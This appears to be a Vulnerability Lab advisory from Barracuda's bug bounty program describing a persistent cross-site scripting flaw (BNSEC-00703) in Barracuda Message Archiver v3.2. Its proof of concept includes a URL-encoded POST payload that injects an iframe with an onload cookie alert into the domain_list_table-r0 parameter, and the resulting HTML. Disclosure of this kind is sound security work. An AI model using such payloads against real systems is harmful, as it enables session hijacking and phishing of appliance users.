Barracuda Networks Bug Bounty Program - Message Archiver 650 v3.2 Persistent Vulnerability BNSEC:703

Barracuda Networks Bug Bounty - Message Archiver 650 v3.2 Persistent Vulnerability

Barracuda Networks, Inc. is a company providing security, networking and storage products based on network appliances and cloud services. The company’s security products include products for protection against email, web surfing, web hackers and instant messaging threats such as spam, spyware, trojans, and viruses.

Since the next week starts, we begin to explain the first of 7 - 0day vulnerabilities in the famous barracuda networks product series. Barracuda Networks has since 2011 an official bug bounty program for individuals. The bug bounty program is connected to the security departement crew and developer team of barracuda networks. The Vulnerability Laboratory Core Team participate in the official security program of barracuda networks since the startup.

Barracuda Networks Security ID (BNSEC): 703

BNSEC-00703: Remote authenticated persistent XSS in Barracuda Message Archiver v3.2
Solution #00006604

The vulnerability was located in the `Benutzer > Neu Anlegen > Rolle: Auditor > Domänen` module. Remote attackers are able to inject own malicious script codes in the vulnerable domain_list_table-r0 values. The execution of the script code occurs in the domain_list_table-r0 and user_domain_admin:1 appliance  application response context. The request method is POST and the attack vector is persistent on the application-side of the barracuda networks message archiver web appliance.

The security risk of the persistent input validation web vulnerability is estimated as medium with a cvss (common vulnerability scoring system) count of 3.6. Exploitation of the vulnerability requires a low privileged or restricted application user account with low or medium user interaction. Successful exploitation of the vulnerability results in session hijacking, persistent phishing, persistent external redirects and persistent manipulation of module context.

Request Method(s):
[+] POST

Vulnerable Module(s):
[+] Benutzer > Neu Anlegen > Rolle: Auditor

Vulnerable Input(s):
[+] Domänen

Vulnerable Parameter(s):
[+] domain_list_table-r0

Affected Module(s):
[+] Rolle: Auditor Listing

Proof of Concept (PoC):
The persistent web vulnerability can be exploited by remote attackers with low privileged or restricted application user account and low required user inter action. For security demonstration or to reproduce the remote web vulnerability follow the provided information and steps below to continue.

--- PoC Session Logs [POST] ---
ajax_bc_sub=addDomain
domain=%22%3E%3Ciframe%20src%3Dhttp%3A%2F%2Fvuln-lab.com%20onload%3Dalert(document.cookie)%20%3C%20%20%22%3E%3Ciframe%20src
%3Dhttp%3A%2F%2Fvuln-lab.com%20onload%3Dalert(document.cookie)%20%3C
user=guest
password=75361da9533223d9685576d10bd6aa02
et=
1352520628
locale=de_DE
realm=
auth_type=Local
primary_tab=USERS
secondary_tab=per_user_add_update

PoC (URL):
http://archiver.ptest.localhost:3378/cgi-mod/index.cgi?auth_type=Local&e...
primary_tab=USERS&realm=&secondary_tab=per_user_add_update&user=benjaminKM

PoC: Benutzer > Neu Anlegen > Rolle: Auditor > Domänen > (domain_list_table-r0)
<td style="vertical-align:middle;text-align:left;white-space:nowrap">
%20&#8203;&#8203;&#8203;&#8203;&#8203;">&#8203;&#8203;&#8203;&#8203;&#8203;<iframe src="http://vuln-lab.com" onload="alert(document.cookie)" <=""
"="[PERSISTENT INJECTED SCRIPT CODE!]< </iframe><input name="user_domain_admin:1"
id="user_domain_admin:1" value=""[PERSISTENT INJECTED SCRIPT CODE!]" type="hidden"></td>

Reference(s):
http://archiver.ptest.localhost:3378/cgi-mod/index.cgi

http://archiver.ptest.localhost:3378/cgi-mod/index.cgi?auth_type=Local&e...
primary_tab=USERS&realm=&secondary_tab=per_user_add_update&user=benjaminKM_0ne

Advisory: http://www.vulnerability-lab.com/get_content.php?id=751

Bulletin: https://www.barracuda.com/support/knowledgebase/501600000013lXe